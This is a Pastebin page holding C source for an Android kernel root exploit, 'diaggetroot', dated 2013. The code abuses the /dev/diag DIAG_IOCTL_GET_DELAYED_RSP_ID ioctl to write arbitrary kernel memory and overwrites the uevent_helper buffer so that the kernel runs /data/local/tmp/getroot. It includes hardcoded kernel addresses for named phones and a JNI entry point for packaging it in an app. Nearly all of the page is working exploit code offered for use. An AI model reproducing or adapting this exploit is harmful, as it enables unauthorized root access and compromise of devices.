API tools faq
paste
Advertisement
goroh_kun

diagwritevalue source code

goroh_kun
Jan 15th, 2013
512
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 4.26 KB | None | 0 0
raw download clone embed print report
  1. ################## jni.c ###########################
  2. #include <stdio.h>
  3. #include <stdint.h>
  4. #include <stdlib.h>
  5. #include <unistd.h>
  6. #include <jni.h>
  7. #include <sys/mman.h>
  8.  
  9. #define  LOG_TAG    "diaggetroot"
  10. #define  LOGI(...)  __android_log_print(ANDROID_LOG_INFO,LOG_TAG,__VA_ARGS__)
  11. #define  LOGD(...)  __android_log_print(ANDROID_LOG_DEBUG,LOG_TAG,__VA_ARGS__)
  12. #define  LOGE(...)  __android_log_print(ANDROID_LOG_ERROR,LOG_TAG,__VA_ARGS__)
  13.  
  14. #include <android/log.h>
  15.  
  16. struct values {
  17.     unsigned addr;
  18.     unsigned short value;
  19. };
  20.  
  21. extern void b(void* adr, int value, int fd);
  22.  
  23. int cmpare( const void * a , const void * b ) {
  24.     const struct values *x = a;
  25.     const struct values *y = b;
  26.     if(x->value < y->value) {
  27.        return -1;
  28.     }
  29.     if(x->value == y->value) {
  30.        return 0;
  31.     }
  32.     return 1;
  33. }
  34.  
  35. static void uevent_helper_mod(int fd)
  36. {
  37. //    unsigned _buf = 0xc0d0dfd0; //htc batterfly uevent_helper_buffer
  38.     unsigned _buf = 0xC0643D20; //is03
  39.     const char* path="/data/local/tmp/getroot\0";
  40.     struct values datas[400];
  41.     int i, j;
  42.     j=0;
  43.     for(i=0; i<strlen(path); i+=2){
  44.       datas[j].addr = _buf+ i;
  45.       datas[j].value = path[i] | (path[i+1] << 8);
  46.       j++;
  47.     }
  48.     qsort( datas, j, sizeof(struct values), cmpare);
  49.     for(i=0; i<j; i++){
  50.         LOGD("data[%d] addr=%x value=%x", i, datas[i].addr, datas[i].value);
  51.         b((void*)datas[i].addr, datas[i].value, fd);
  52.     }
  53. }
  54.  
  55. static void write_value(int fd, unsigned address, unsigned value)
  56. {
  57. //    b((void*)0xc0da86d0, 0xa924, fd);
  58. //    b((void*)0xc0da86d2, 0xc034, fd);
  59. printf("write_value(0x%x, 0x%x)\n", address, value);
  60.     b((void*)address, value & 0xffff, fd);
  61.     b((void*)address+2, (value >> 16) & 0xffff, fd);
  62. }
  63.  
  64. void
  65. Java_com_example_diaggetroot_MainActivity_getrootnative( JNIEnv* env,
  66.                                                   jobject thiz, int fd)
  67. {
  68.     uevent_helper_mod(fd);
  69. }
  70.  
  71. extern unsigned p_delayed_rsp_id;
  72.  
  73. int main(int argc, char** argv)
  74. {
  75.     unsigned long address = 0;
  76.     unsigned long value = 0;
  77.     char *endptr;
  78.     if(argc < 2) {
  79.         printf("%s address value\n", argv[0]);
  80.         return 0;
  81.     }
  82.     address = strtoll(argv[1], &endptr, 0);
  83.     value = strtoll(argv[2], &endptr, 0);
  84.     if(argc > 3){
  85.         p_delayed_rsp_id = strtoll(argv[3], &endptr, 0);
  86.     }
  87.     write_value(0, address, value);
  88. //    uevent_helper_mod(0);
  89.     return 0;
  90. }
  91.  
  92. ################## diag.c ###########################
  93. #include <stdio.h>
  94. #include <unistd.h>
  95. #include <errno.h>
  96. #include <signal.h>
  97. #include <stdlib.h>
  98. #include <dlfcn.h>
  99. #include <elf.h>
  100. #include <sys/system_properties.h>
  101. #include <fcntl.h>
  102. #include <stdarg.h>
  103.  
  104. #define  LOG_TAG    "diaggetroot"
  105. #define  LOGI(...)  __android_log_print(ANDROID_LOG_INFO,LOG_TAG,__VA_ARGS__)
  106. #define  LOGD(...)  __android_log_print(ANDROID_LOG_DEBUG,LOG_TAG,__VA_ARGS__)
  107. #define  LOGE(...)  __android_log_print(ANDROID_LOG_ERROR,LOG_TAG,__VA_ARGS__)
  108.  
  109. #include <android/log.h>
  110.  
  111. #define DIAG_IOCTL_GET_DELAYED_RSP_ID   8
  112. struct diagpkt_delay_params{
  113.     void *rsp_ptr;
  114.     int size;
  115.     int *num_bytes_ptr;
  116. };
  117.  
  118. unsigned p_delayed_rsp_id = 0xc0da86ec;
  119.  
  120. static void b2(void* adr, int value, int fd)
  121. {
  122.   uint16_t ptr;
  123.   int i;
  124.   int num;
  125.   int ret;
  126.   struct diagpkt_delay_params p;
  127.  
  128.   ptr = 0;
  129.   p.rsp_ptr = &ptr;
  130.   p.size = 2;
  131.   p.num_bytes_ptr = (void*)p_delayed_rsp_id; // SH02E
  132. //  p.num_bytes_ptr = (void*)0xC06485A8; // IS03
  133. //  p.num_bytes_ptr = (void*)0xc0ba8394; // HTC butterfly
  134.  
  135.   ret = ioctl(fd, DIAG_IOCTL_GET_DELAYED_RSP_ID, &p);
  136.  
  137.   ptr = 0;
  138.   p.rsp_ptr = &ptr;
  139.   p.size = 2;
  140.   num = 0;
  141.   p.num_bytes_ptr = &num;
  142.  
  143.   ret = ioctl(fd, DIAG_IOCTL_GET_DELAYED_RSP_ID, &p);
  144.  
  145.   ptr = (value - ptr) & 0xffff;
  146.   LOGD("loop = %x\n", ptr);
  147.   printf("loop = %x\n", ptr);
  148.  
  149.   for(i=0; i< ptr; i++) {
  150.     num = 0;
  151.     p.rsp_ptr = adr;
  152.     p.size = 2;
  153.     p.num_bytes_ptr = &num;
  154.     ret = ioctl(fd, DIAG_IOCTL_GET_DELAYED_RSP_ID, &p);
  155.   }
  156. }
  157.  
  158. void b(void* adr, int value, int fd)
  159. {
  160.   static int fd2;
  161. //  printf("delayed_rsp_id = 0x%x\n", p_delayed_rsp_id);
  162.   if(fd == 0){
  163.     if(fd2 == 0){
  164.       fd2 = open("/dev/diag", O_RDWR);
  165.     }
  166.     fd = fd2;
  167.   }
  168.   if(fd < 0) {
  169.     LOGE("fd=%d", fd);
  170.     return;
  171.   }
  172.   b2(adr, value, fd);
  173. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!